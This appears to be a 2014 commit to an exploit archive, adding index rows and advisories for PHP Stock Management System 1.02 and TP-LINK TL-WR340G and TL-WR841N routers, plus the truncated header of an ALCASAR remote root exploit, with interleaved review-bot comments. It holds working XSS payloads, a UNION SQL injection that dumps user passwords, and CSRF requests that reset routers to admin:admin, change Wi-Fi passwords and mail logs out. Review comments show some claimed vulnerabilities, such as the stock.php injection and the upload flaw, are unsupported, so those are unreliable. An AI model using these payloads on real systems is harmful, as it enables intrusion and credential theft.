Updated 09_11_2014
This commit is contained in:
parent
38f34a5333
commit
afeaf30889
19 changed files with 3024 additions and 1 deletions
20
files.csv
20
files.csv
|
@ -3143,7 +3143,7 @@ id,file,description,date,author,platform,type,port
|
|||
3479,platforms/linux/local/3479.php,"PHP <= 5.2.1 session_regenerate_id() Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
|
||||
3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 Rejected Session ID Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
|
||||
3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 (AdminBlogNewsEdit.asp) Remote Auth Bypass Vuln",2007-03-15,WiLdBoY,asp,webapps,0
|
||||
3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 (USER) Remote Buffer Overflow SEH Overflow Exploit",2007-03-15,"Umesh Wanve",windows,remote,21
|
||||
3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 - (USER) Remote Buffer Overflow SEH Overflow Exploit",2007-03-15,"Umesh Wanve",windows,remote,21
|
||||
3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x (usergroups.php) Remote SQL Injection Exploit",2007-03-15,x666,php,webapps,0
|
||||
3484,platforms/php/webapps/3484.txt,"WebLog (index.php file) Remote File Disclosure Vulnerability",2007-03-15,Dj7xpl,php,webapps,0
|
||||
3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 (INCLUDE_PATH) RFI Vulnerability",2007-03-15,the_day,php,webapps,0
|
||||
|
@ -31137,5 +31137,23 @@ id,file,description,date,author,platform,type,port
|
|||
34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar <= 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0
|
||||
34572,platforms/php/webapps/34572.txt,"Wordpress Bulk Delete Users by Email Plugin 1.0 - CSRF",2014-09-08,"Fikri Fadzil",php,webapps,0
|
||||
34578,platforms/php/webapps/34578.txt,"WordPress Acento Theme (view-pdf.php, file param) - Arbitrary File Download",2014-09-08,alieye,php,webapps,80
|
||||
34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.X - Persistent Cross Site Scripting",2014-09-08,smash,php,webapps,80
|
||||
34580,platforms/php/webapps/34580.txt,"phpMyFAQ 2.8.X - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80
|
||||
34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80
|
||||
34582,platforms/php/webapps/34582.txt,"osCommerce 2.3.4 - Multiple vulnerabilities",2014-09-08,smash,php,webapps,80
|
||||
34583,platforms/hardware/webapps/34583.txt,"TP-LINK Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80
|
||||
34584,platforms/hardware/webapps/34584.txt,"TP-LINK Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80
|
||||
34585,platforms/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,443
|
||||
34586,platforms/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",php,webapps,80
|
||||
34587,platforms/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,multiple,webapps,8090
|
||||
34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilty",2014-09-09,jsass,aix,dos,0
|
||||
34592,platforms/linux/shellcode/34592.c,"Obfuscated Shellcode Linux x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash",2014-09-09,"Ali Razmjoo",linux,shellcode,0
|
||||
34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,metasploit,windows,remote,8020
|
||||
34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 Remote Root Code Execution Vulnerability",2014-09-09,eF,linux,remote,80
|
||||
34596,platforms/php/webapps/34596.txt,"Pligg CMS 1.0.4 SQL Injection and Cross Site Scripting Vulnerabilities",2010-09-03,"Bogdan Calin",php,webapps,0
|
||||
34597,platforms/php/webapps/34597.txt,"Datetopia Buy Dating Site Cross Site Scripting Vulnerability",2010-09-10,Moudi,php,webapps,0
|
||||
34598,platforms/php/webapps/34598.txt,"SZNews 2.7 'printnews.php3' Remote File Include Vulnerability",2009-09-11,"kurdish hackers team",php,webapps,0
|
||||
34599,platforms/php/webapps/34599.txt,"tourismscripts HotelBook 'hotel_id' Parameter Multiple SQL Injection Vulnerabilities",2009-09-10,Mr.SQL,php,webapps,0
|
||||
34600,platforms/php/webapps/34600.txt,"Match Agency BiZ edit_profile.php important Parameter XSS",2009-09-11,Moudi,php,webapps,0
|
||||
34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
|
||||
34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0
|
||||
|
|
|
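Review bot: The new row for 34588 in the second hunk files a PHP web-application advisory under platform `aix` and type `dos` with port 0, while the 34588.txt section added by this same commit names "PHP Stock Management System" and describes XSS, SQL injection and upload issues in install.php, stock.php, view_customers.php, view_product.php and logo_set.php, and every comparable new row uses `php,webapps,80`. The path column mirrors the misfiling (`platforms/aix/dos/34588.txt`), so correcting it means moving the file together with the row, e.g. `34588,platforms/php/webapps/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilities",2014-09-09,jsass,php,webapps,80`. The description also carries the typo "Vulnerabilty". The same hunk mixes the hyphenated "Product - Description" title style of 34571–34587 with the older unhyphenated style of 34589–34602, which a later normalisation pass will have to reconcile.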
189
platforms/aix/dos/34588.txt
Executable file
189
platforms/aix/dos/34588.txt
Executable file
|
@ -0,0 +1,189 @@
|
|||
# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty
|
||||
# Date : 9-9-2014
|
||||
# Author : jsass
|
||||
?# Vendor Homepage: ?http://www.posnic.com/?
|
||||
# Software Link:? http://sourceforge.net/projects/stockmanagement/
|
||||
# Version: ?1.02
|
||||
# Tested on: kali linux
|
||||
# Twitter : @KwSecurity
|
||||
# Group : Q8 GRAY HAT TEAM
|
||||
|
||||
#########################################################################################################
|
||||
|
||||
|
||||
|
||||
XSS install.php
|
||||
|
||||
code :
|
||||
|
||||
if(isset($_REQUEST['msg'])) {
|
||||
|
||||
$msg=$_REQUEST['msg'];
|
||||
echo "<p style=color:red>$msg</p>";
|
||||
}
|
||||
|
||||
|
||||
exploit :
|
||||
|
||||
http://localhost/demo/POSNIC1.02DesignFix/install.php?msg=1%22%3E%3Cscript%3Ealert%28%27jsass%27%29%3C/script%3E
|
||||
|
||||
|
||||
#########################################################################################################
|
||||
|
||||
SQL INJECTION : stock.php
|
||||
|
||||
code :
|
||||
|
||||
|
||||
include_once("init.php");
|
||||
$q = strtolower($_GET["q"]);
|
||||
if (!$q) return;
|
||||
$db->query("SELECT * FROM stock_avail where quantity >0 ");
|
||||
while ($line = $db->fetchNextObject()) {
|
||||
|
||||
if (strpos(strtolower($line->name), $q) !== false) {
|
||||
echo "$line->name\n";
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
exploit :
|
||||
|
||||
|
||||
localhost/demo/POSNIC1.02DesignFix/stock.php?q=2(inject)
|
||||
|
||||
|
||||
#########################################################################################################
|
||||
SQL INJECTION : view_customers.php
|
||||
|
||||
|
||||
|
||||
|
||||
code :
|
||||
|
||||
$SQL = "SELECT * FROM customer_details";
|
||||
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
|
||||
{
|
||||
|
||||
$SQL = "SELECT * FROM customer_details WHERE customer_name LIKE '%".$_POST['searchtxt']."%' OR customer_address LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%'";
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
exploit :
|
||||
|
||||
|
||||
http://localhost/demo/POSNIC1.02DesignFix/view_customers.php
|
||||
|
||||
POST
|
||||
|
||||
searchtxt=1(inject)&Search=Search
|
||||
|
||||
searchtxt=-1' /*!UNION*/ /*!SELECT*/ 1,/*!12345CONCAT(id,0x3a,username,0x3a,password)*/,3,4,5,6+from stock_user-- -&Search=Search
|
||||
#########################################################################################################
|
||||
|
||||
|
||||
SQL INJECTION : view_product.php
|
||||
|
||||
code :
|
||||
|
||||
if(isset($_GET['limit']) && is_numeric($_GET['limit'])){
|
||||
$limit=$_GET['limit'];
|
||||
$_GET['limit']=10;
|
||||
}
|
||||
|
||||
$page = $_GET['page'];
|
||||
|
||||
|
||||
if($page)
|
||||
|
||||
$start = ($page - 1) * $limit; //first item to display on this page
|
||||
|
||||
else
|
||||
|
||||
$start = 0; //if no page var is given, set start to 0
|
||||
|
||||
|
||||
|
||||
/* Get data. */
|
||||
|
||||
$sql = "SELECT * FROM stock_details LIMIT $start, $limit ";
|
||||
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
|
||||
{
|
||||
|
||||
$sql= "SELECT * FROM stock_details WHERE stock_name LIKE '%".$_POST['searchtxt']."%' OR stock_id LIKE '%".$_POST['searchtxt']."%' OR supplier_id LIKE '%".$_POST['searchtxt']."%' OR date LIKE '%".$_POST['searchtxt']."%' LIMIT $start, $limit";
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
||||
$result = mysql_query($sql);
|
||||
|
||||
|
||||
|
||||
exploit :
|
||||
|
||||
localhost/demo/POSNIC1.02DesignFix/view_product.php?page=1&limit=1(inject)
|
||||
and
|
||||
|
||||
localhost/demo/POSNIC1.02DesignFix/view_product.php
|
||||
post
|
||||
searchtxt=a(inject)&Search=Search
|
||||
|
||||
|
||||
|
||||
|
||||
#########################################################################################################
|
||||
|
||||
UPLOAD : logo_set.php
|
||||
|
||||
code :
|
||||
|
||||
<?php if(isset($_POST['submit'])){
|
||||
|
||||
$allowedExts = array("gif", "jpeg", "jpg", "png");
|
||||
$temp = explode(".", $_FILES["file"]["name"]);
|
||||
$extension = end($temp);
|
||||
if ((($_FILES["file"]["type"] == "image/gif")
|
||||
|| ($_FILES["file"]["type"] == "image/png"))
|
||||
&& ($_FILES["file"]["size"] < 20000)
|
||||
&& in_array($extension, $allowedExts))
|
||||
{
|
||||
if ($_FILES["file"]["error"] > 0)
|
||||
{
|
||||
echo "Return Code: " . $_FILES["file"]["error"] . "<br>";
|
||||
}
|
||||
else
|
||||
{
|
||||
$upload= $_FILES["file"]["name"] ;
|
||||
$type=$_FILES["file"]["type"];
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
exploit :
|
||||
|
||||
http://localhost/demo/POSNIC1.02DesignFix/logo_set.php
|
||||
#########################################################################################################
|
||||
|
||||
|
||||
|
||||
AND MORE BUGS
|
||||
|
||||
Bye
|
||||
|
||||
#########################################################################################################
|
||||
|
||||
|
||||
Great's : Nu11Byt3 , dzkabyle , Massacreur , Ze3r0Six , Hannibal , OrPh4ns , rDNix , OxAlien , Dead HackerZ , Somebody Knight
|
||||
|
||||
sec4ever.com & alm3refh.com
|
||||
|
||||
#########################################################################################################
|
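Review bot: The "SQL INJECTION : stock.php" section is not supported by the code it quotes: `$q` is only passed to `strpos()` against rows already returned by the fixed `SELECT * FROM stock_avail where quantity >0` query and never reaches SQL, so what is shown is a case-insensitive substring search rather than an injection. The `view_product.php` `limit` vector has the same weakness, because `$limit` is only assigned after `is_numeric()` succeeds and a non-numeric value simply leaves `LIMIT $start, ` empty (a query error, not an injection), whereas the POST `searchtxt` concatenation in `view_customers.php` and `view_product.php` is a genuine unparameterised sink and is the finding worth keeping. The `logo_set.php` excerpt stops before any `move_uploaded_file()` call, and the visible condition enforces both an extension allow-list and a (client-supplied) MIME type, so the upload claim is not substantiated by the excerpt as shown. The title's "Vulnerabilty" should read "Vulnerabilities".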
183
platforms/hardware/webapps/34583.txt
Executable file
183
platforms/hardware/webapps/34583.txt
Executable file
|
@ -0,0 +1,183 @@
|
|||
#Title: TP-LINK Model No. TL-WR340G/TL-WR340GD - Multiple Vulnerabilities
|
||||
#Date: 01.07.14
|
||||
#Vendor: TP-LINK
|
||||
#Affected versions: TL-WR340G/TL-WR340GD
|
||||
#Tested on: Firmware Version - 4.3.7 Build 090901 Rel.61899n, Hardware Version - WR340G v5 081520C2 [at] Linux
|
||||
#Contact: smash [at] devilteam.pl
|
||||
|
||||
Persistent Cross Site Scripting vulnerabilities exists because of poor parameters filtration. Our value is stored in javascript array, since it's not correctly verified nor filtered, it is able to inject javascript code. It will be executed whenever user will visit specific settings page. Because of no CSRF prevention, it is able to compromise router. Attacker may force user to restore factory default settings, and then to turn on remote managment; in result, it will be able to log in using default username and password (admin:admin).
|
||||
|
||||
Config file - 192.168.1.1/userRpm/config.bin
|
||||
|
||||
|
||||
#1 - Cross Site Scripting
|
||||
|
||||
|
||||
a) Persistent XSS in Network > WAN Settings
|
||||
|
||||
Vulnerable parameter - hostName.
|
||||
|
||||
Request:
|
||||
GET /userRpm/WanDynamicIpCfgRpm.htm?wantype=Dynamic+IP&hostName=%3C/script%3E%3Cscript%3Ealert(123)%3C/script%3E&mtu=1500&Save=Save HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var dhcpInf = new Array(
|
||||
1,
|
||||
(...)
|
||||
"</script><script>alert(123)</script>",
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
(...)
|
||||
|
||||
|
||||
b) Persitent XSS in Wireless Settings
|
||||
|
||||
Vulnerable parameter - ssid.
|
||||
|
||||
Request:
|
||||
GET /userRpm/WlanNetworkRpm.htm?ssid=%3C%2Fscript%3Exssed%3C%3E®ion=102&channel=6&mode=2&ap=2&broadcast=2&secType=1&secOpt=3&keytype=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var wlanPara = new Array(
|
||||
5, 0, "</script>xssed<>", 114, 102, 1, 6, 2, 1, 1, 0, "", "", "", "", "", "", 0, 1, "333", 1, "11", 1, "0.0.0.0", 1812, "", "", 86400, 86400, 1,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
(...)
|
||||
|
||||
|
||||
c) Persistent XSS in DHCP Settings
|
||||
|
||||
Vulnerable parameter - domain.
|
||||
|
||||
Request:
|
||||
GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=</script><xssed>'"&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
Referer: http://192.168.1.1/userRpm/LanDhcpServerRpm.htm
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var DHCPPara = new Array(
|
||||
1,
|
||||
"192.168.1.100",
|
||||
"192.168.1.199",
|
||||
120,
|
||||
"0.0.0.0",
|
||||
"</script><xssed>'\"",
|
||||
"0.0.0.0",
|
||||
"0.0.0.0",
|
||||
1,
|
||||
1,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
(...)
|
||||
|
||||
|
||||
d) Persitent XSS in Security > Domain Filtering
|
||||
|
||||
Vulnerable parameter - domain; value is being validated by js to prevent illegal characters in domain name. It is able to avoid this filtration by sending raw http request.
|
||||
|
||||
Request:
|
||||
GET /userRpm/DomainFilterRpm.htm?begintime=0000&endtime=2400&domain=hm</script><xssed>'"&State=1&Changed=1&SelIndex=0&Page=1&Save=Save HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var domainFilterList = new Array(
|
||||
"0000-2400", "hm</script><xssed>'\"", 1,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
(...)
|
||||
|
||||
|
||||
e) Persistent XSS in Dynamic DNS Settings
|
||||
|
||||
Vulnerable parameters - username & cliUrl.
|
||||
|
||||
Request:
|
||||
GET /userRpm/DynDdnsRpm.htm?provider=2&username=&pwd=&cliUrl=</script><script>alert(123)</script>&Save=Save HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var serInf = new Array(
|
||||
"",
|
||||
"",
|
||||
"</script><script>alert(123)</script>",
|
||||
0,
|
||||
0,
|
||||
2,
|
||||
2,
|
||||
0,
|
||||
1,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
(...)
|
||||
|
||||
|
||||
#2 - CSRF
|
||||
|
||||
|
||||
a) Change LAN IP
|
||||
|
||||
Parameter lanip stands for further ip.
|
||||
|
||||
GET /userRpm/NetworkLanCfgRpm.htm?lanip=192.168.1.2&lanmask=255.255.255.0&Save=Save HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
|
||||
|
||||
b) Change remote managment settings
|
||||
|
||||
GET /userRpm/ManageControlRpm.htm?port=80&ip=0.0.0.0&Save=Save HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
|
||||
|
||||
c) Clear syslog
|
||||
|
||||
GET /userRpm/SystemLogRpm.htm?Clearlog=Clear+All HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
|
||||
|
||||
d) Reboot device
|
||||
|
||||
GET /userRpm/SysRebootRpm.htm?Reboot=Reboot HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
|
||||
|
||||
e) Restore factory defaults (admin:admin)
|
||||
|
||||
GET /userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore HTTP/1.1
|
||||
Host: 192.168.1
|
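Review bot: The section's last line reads `Host: 192.168.1` although the hunk header promises 183 lines, so the committed file appears to be cut off mid-line; confirm it ends with a complete `Host: 192.168.1.1` and whatever followed it. The introduction asserts that the CSRF chain ends in a login as admin:admin after a factory reset, but every response shown carries `WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"`, which suggests the device relies on HTTP Basic authentication; the advisory should state the precondition that the victim's browser presumably must already hold those credentials for a cross-site request to be honoured. The line `Config file - 192.168.1.1/userRpm/config.bin` stands alone with no explanation of what it demonstrates. Minor: "Persitent" (twice), "managment" and "filtration" should read "Persistent", "management" and "filtering".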
194
platforms/hardware/webapps/34584.txt
Executable file
194
platforms/hardware/webapps/34584.txt
Executable file
|
@ -0,0 +1,194 @@
|
|||
#Title: TP-LINK Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities
|
||||
#Date: 30.06.14
|
||||
#Vendor: TP-LINK
|
||||
#Affected versions: TL-WR841N / TL-WR841ND
|
||||
#Tested on: Firmware Version - 3.13.27 Build 121101 Rel.38183n, Hardware Version - WR841N v8 00000000 [at] Linux
|
||||
#Contact: smash [at] devilteam.pl
|
||||
|
||||
#1 - Reflected XSS in Wireless Settings
|
||||
|
||||
Vulnerable parameters - ssid1, ssid2, ssid3, ssid4.
|
||||
|
||||
Variables of ssid parameters are being included to wlanPara array. Because of poor filtration of those values, it is able to execute specific javascript command as shown below.
|
||||
|
||||
While system log and config is being saved as local file (http://192.168.0.1/userRpm/SystemLog.txt & http://192.168.0.1/userRpm/config.bin), it is able to hjiack both via xss.
|
||||
|
||||
Request:
|
||||
http://192.168.0.1/userRpm/WlanNetworkRpm.htm?ssid1=ROUTERNAME</script><script>alert(123)</script>&ssid2=ROUTERNAME_2&ssid3=ROUTERNAME_3&ssid4=ROUTERNAME_4®ion=101&band=0&mode=5&chanWidth=2&channel=15&rate=71&ap=1&broadcast=2&brlssid=&brlbssid=&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router Webserver
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
|
||||
(...)
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var wlanPara = new Array(
|
||||
0,8,0,"ROUTERNAME</script><script>alert(123)</script>",108,101,1,5,1,1,15,2,71,0,0,0,"cript>","ROUTERNAME_3","ROUTERNAME_4",691810163,0,0,0,"","",1,"",1,1,3,3,0,1,1,36,0,0,"","","","","","","","",1,"",0,"","",1,0,0,1,0,1,0,0 );
|
||||
</SCRIPT>
|
||||
|
||||
#2 - Persistent XSS & CSRF in Wireless Security Settings
|
||||
|
||||
Vulnerable parameter - pskSecret.
|
||||
|
||||
Same as above, variable of pskSecret (password) is being included in javascript array. Because of no CSRF prevention, it is able to change the password by visiting url below. pskSecret value is responsible for further password.
|
||||
|
||||
Request:
|
||||
http://192.168.0.1/userRpm/WlanSecurityRpm.htm?secType=3&pskSecOpt=2&pskCipher=3&pskSecret=test&interval=0&wpaSecOpt=3&wpaCipher=1&radiusIp=&radiusPort=1812&radiusSecret=&intervalWpa=0&wepSecOpt=3&keytype=1&keynum=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router Webserver
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var wlanPara = new Array(
|
||||
8, 1, 3, "332", 1, 0, "", 1812, "", "</script><script>alert(123)</script>", 1, 0, 0, 1, 3, 0, 0, 0, 5, 0, 1, "", 1,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
|
||||
#3 - Persistent XSS & CSRF in Mail Settings
|
||||
|
||||
Vulnerable parameters - FromAddr, ToAddr, SMTPAddr.
|
||||
|
||||
Reason is the same.
|
||||
|
||||
Request:
|
||||
http://192.168.0.1/userRpm/AutoEmailRpm.htm?FromAddr=test%40test.com&ToAddr=test1%40test.com&SMTPAddr=</script><script>alert(123)</script>&User=&Password=&VeriPass=&Save=Save
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router Webserver
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var autoEmailConf = new Array(
|
||||
"test@test.com",
|
||||
"test1@test.com",
|
||||
"</script><script>alert(123)</script>",
|
||||
0,
|
||||
"",
|
||||
0,
|
||||
0,
|
||||
0,
|
||||
0,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
|
||||
It is able to steal system logs by forcing our victim to set our mail settings via csrf, then logs will be send after visiting address below:
|
||||
http://192.168.0.1/userRpm/SystemLogRpm.htm?doMailLog=2
|
||||
|
||||
#4 - Persistent XSS & CSRF in Time Settings
|
||||
|
||||
Vulnerable parameters - ntpA & ntpB.
|
||||
|
||||
Request:
|
||||
http://192.168.0.1/userRpm/DateTimeCfgRpm.htm?timezone=0&month=7&day=1&year=2014&hour=2&minute=44&second=18&ntpA=</script><script>xssed<>&ntpB=&isTimeChanged=0&start_month=0&start_count=0&start_week=1&start_hour=0&end_month=0&end_count=0&end_week=1&end_hour=0&isDaylightSavingChanged=0&Save=Save
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router Webserver
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var timeInf = new Array(
|
||||
7,
|
||||
1,
|
||||
2014,
|
||||
2,
|
||||
58,
|
||||
52,
|
||||
0,
|
||||
"</script>xssed<>",
|
||||
"0.0.0.0",
|
||||
2,
|
||||
2,
|
||||
0,
|
||||
2,
|
||||
10,
|
||||
1,
|
||||
0,
|
||||
3,
|
||||
0,
|
||||
0,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
|
||||
#5 - Persistent XSS & CSRF in Dynamic DNS settings
|
||||
|
||||
Vulnerable parameters - username, password, cliUrl.
|
||||
|
||||
Request:
|
||||
http://192.168.0.1/userRpm/NoipDdnsRpm.htm?provider=3&username=</script><script>alert(123)</script>&pwd=password&cliUrl=&Save=Save
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router Webserver
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var serInf = new Array(
|
||||
"</script><script>alert(123)</script>",
|
||||
"password",
|
||||
"",
|
||||
0,
|
||||
0,
|
||||
3,
|
||||
2,
|
||||
0,
|
||||
1,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
|
||||
#6 - Persistent XSS & CSRF in DHCP settings
|
||||
|
||||
Vulnerable parameter - domain.
|
||||
|
||||
Request:
|
||||
http://192.168.0.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.0.100&ip2=192.168.0.199&Lease=120&gateway=192.168.0.1&domain=</script>xssed<>&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router Webserver
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var DHCPPara = new Array(
|
||||
1,
|
||||
"192.168.0.100",
|
||||
"192.168.0.199",
|
||||
120,
|
||||
"192.168.0.1",
|
||||
"</script>xssed<>",
|
||||
"0.0.0.0",
|
||||
"0.0.0.0",
|
||||
1,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
|
||||
#7 - Other CSRF's
|
||||
|
||||
a) Clear system logs
|
||||
|
||||
http://192.168.0.1/userRpm/SystemLogRpm.htm?logType=0&logLevel=7&ClearLog=Clear+Log&selPage=1&Page=1
|
||||
|
||||
b) Reboot device
|
||||
|
||||
http://192.168.0.1/userRpm/SysRebootRpm.htm?Reboot=Reboot
|
||||
|
||||
c) Factory defaults reset (admin:admin)
|
||||
|
||||
http://192.168.0.1/userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore
|
||||
|
||||
Actually, there is no prevention technique to avoid csrf in this one; bug's pointed above are most interesting.
|
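Review bot: Finding #1 is headed "Reflected XSS in Wireless Settings" although its request is the same `Save=Save` settings write used in #2–#6, which are all labelled persistent, and the response echoes the value from the `wlanPara` array exactly as the persistent cases do; the classification should be made consistent or the difference explained. In that response the `ssid2` slot appears as `"cript>"` rather than `ROUTERNAME_2`, so the device appears to mangle the submitted values and only `ssid1` is actually demonstrated, while the text claims `ssid1`–`ssid4`. The closing sentence "Actually, there is no prevention technique to avoid csrf in this one; bug's pointed above are most interesting" is unclear and could read "The device has no CSRF protection at all; the requests above are the most useful examples." Minor: "hjiack" should read "hijack".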
213
platforms/linux/remote/34595.py
Executable file
213
platforms/linux/remote/34595.py
Executable file
|
@ -0,0 +1,213 @@
|
|||
#!/usr/bin/env python
|
||||
# -*- coding: utf-8 -*-
|
||||
#
|
||||
####
|
||||
#
|
||||
# ALCASAR <= 2.8 Remote Root Code Execution Vulnerability
|
||||
#
|
||||
# Author: eF
|
||||
# Date : 2014-02-10
|
||||
#
|
||||
#
|
||||
# db 88 ,ad8888ba, db ad88888ba db 88888888ba
|
||||
# d88b 88 d8"' `"8b d88b d8" "8b d88b 88 "8b
|
||||
# d8'`8b 88 d8' d8'`8b Y8, d8'`8b 88 ,8P
|
||||
# d8' `8b 88 88 d8' `8b `Y8aaaaa, d8' `8b 88aaaaaa8P'
|
||||
# d8YaaaaY8b 88 88 d8YaaaaY8b `"""""8b, d8YaaaaY8b 88""""88'
|
||||
# d8""""""""8b 88 Y8, d8""""""""8b `8b d8""""""""8b 88 `8b
|
||||
# d8' `8b 88 Y8a. .a8P d8' `8b Y8a a8P d8' `8b 88 `8b
|
||||
# d8' `8b 88888888888 `"Y8888Y"' d8' `8b "Y88888P" d8' `8b 88 `8b
|
||||
#
|
||||
#
|
||||
# ALCASAR is a free Network Access Controller which controls the Internet
|
||||
# consultation networks. It authenticates, attributes and protects users'
|
||||
# access regardless their connected equipment (PC, Pokédex, game console,
|
||||
# etc.).
|
||||
#
|
||||
#
|
